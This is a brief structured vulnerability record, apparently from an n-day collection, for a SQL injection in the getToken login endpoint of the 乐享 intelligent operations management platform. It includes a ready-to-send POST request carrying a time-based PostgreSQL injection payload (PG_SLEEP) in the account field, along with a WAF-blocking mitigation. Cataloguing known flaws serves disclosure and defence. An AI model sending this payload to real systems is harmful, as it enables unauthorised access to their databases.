vendor = "乐享"
name = "乐享智能运维管理平台getToken存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/auth-ui/v1/api/user/token/getToken"
detail = "POST /auth-ui/v1/api/user/token/getToken HTTP/1.1 account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957"
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
